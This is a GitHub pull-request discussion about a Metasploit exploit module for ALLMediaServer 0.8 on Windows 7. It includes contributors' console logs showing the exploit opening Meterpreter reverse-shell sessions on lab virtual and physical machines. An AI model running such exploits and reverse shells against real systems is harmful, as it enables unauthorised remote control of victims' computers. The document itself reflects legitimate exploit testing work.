Target W7 updated according to #607 #608

Merged
merged 1 commit into from Jul 15, 2012

jvazquez-r7
Contributor

According to the testing reflected in #607, the stack pivoting isn't stable on W7 between virtual and physical environments. So I'm avoiding the ROP exploit on W7 at the moment, because W7 is OptIn and AllMediaServer runs without DEP by default.

@modpr0be
Contributor

Hi jvazquez,

I want to confirm the exploitation is also working on my W7 VMware.

msf  exploit(allmediaserver_w7) > exploit 

[*] Started reverse handler on 10.10.10.2:4444 
[*] Sending payload to ALLMediaServer on ALLMediaServer 0.8 / Windows 7 SP1 - English...
[*] Sending stage (752128 bytes) to 10.10.10.12
[*] Meterpreter session 2 opened (10.10.10.2:4444 -> 10.10.10.12:1097) at 2012-07-15 23:40:31 +0700

meterpreter > run checkvm
[*] Checking if target is a Virtual Machine .....
[*] This is a VMware Virtual Machine
meterpreter > sysinfo
Computer        : LABWIN7-PC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > 

Now testing on a physical machine... sorry, a bit slow, I don't have a high-end machine to work faster :D

@modpr0be
Contributor

Confirm the exploit works on the physical machine running W7 SP1.


msf  exploit(allmediaserver_w7) > 
msf  exploit(allmediaserver_w7) > exploit 

[*] Started reverse handler on 10.10.10.2:4444 
[*] Sending payload to ALLMediaServer on ALLMediaServer 0.8 / Windows 7 SP1 - English...
[*] Sending stage (752128 bytes) to 10.10.10.7
[*] Meterpreter session 3 opened (10.10.10.2:4444 -> 10.10.10.7:1382) at 2012-07-16 00:44:35 +0700

meterpreter > run checkvm
[*] Checking if target is a Virtual Machine .....
[*] It appears to be physical host.
meterpreter > sysinfo
Computer        : M1ABRAMS
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter >

The exploit works flawlessly on Windows XP3; no more tests necessary.

@modpr0be
Contributor

Hi jvazquez,

I think it's quite enough to let the Win7 SP1 exploit work without ROP, but the XP SP3 does.
Thank you so much. I learned a lot :)

@wchen-r7 wchen-r7 merged commit 8cf08c6 into rapid7:master Jul 15, 2012
@jvazquez-r7
Contributor Author

THANK you for your collaboration :) Great work!
